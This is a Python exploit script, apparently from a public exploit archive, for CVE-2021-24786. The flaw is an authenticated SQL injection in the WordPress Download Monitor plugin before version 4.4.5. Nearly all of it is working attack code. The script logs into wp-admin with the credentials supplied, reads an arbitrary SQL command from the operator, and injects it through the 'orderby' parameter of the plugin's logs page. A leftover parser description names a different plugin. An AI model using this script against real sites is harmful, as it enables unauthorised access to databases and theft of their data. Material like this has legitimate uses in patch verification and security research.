WordPress Download Monitor WordPress 4.4.4 SQL Injection

`# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)  
# Date 28.01.2022  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://www.download-monitor.com/  
# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip  
# Version: < 4.4.5  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2021-24786  
# CWE: CWE-89  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md  
  
'''  
Description:  
The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter  
before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue  
'''  
  
# Banner:  
banner = '''  
  
___ __ ____ ___ ____ _ ____ _ _ _____ ___ __   
/ __\/\ /\/__\ |___ \ / _ \___ \/ | |___ \| || |___ ( _ ) / /_   
/ / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \   
/ /___ \ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |  
\____/ \_/\__/ |_____|\___/_____|_| |_____| |_|/_/ \___/ \___/   
  
[+] Download Monitor - SQL-Injection  
[@] Developed by Ron Jost (Hacker5preme)  
'''  
print(banner)  
  
import argparse  
import requests  
from datetime import datetime  
  
# User-Input:  
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')  
my_parser.add_argument('-T', '--IP', type=str)  
my_parser.add_argument('-P', '--PORT', type=str)  
my_parser.add_argument('-U', '--PATH', type=str)  
my_parser.add_argument('-u', '--USERNAME', type=str)  
my_parser.add_argument('-p', '--PASSWORD', type=str)  
args = my_parser.parse_args()  
target_ip = args.IP  
target_port = args.PORT  
wp_path = args.PATH  
username = args.USERNAME  
password = args.PASSWORD  
  
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
# Authentication:  
session = requests.Session()  
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'  
check = session.get(auth_url)  
# Header:  
header = {  
'Host': target_ip,  
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Origin': 'http://' + target_ip,  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1'  
}  
  
# Body:  
body = {  
'log': username,  
'pwd': password,  
'wp-submit': 'Log In',  
'testcookie': '1'  
}  
auth = session.post(auth_url, headers=header, data=body)  
  
# Exploit (WORKS ONLY IF ONE LOG EXISTS)  
print('')  
print ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')  
print('')  
# Generate payload for SQL-Injection  
sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')  
sql_injection_code = sql_injection_code.replace(' ', '+')  
exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'  
exploit = session.get(exploitcode_url)  
print(exploit)  
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
  
`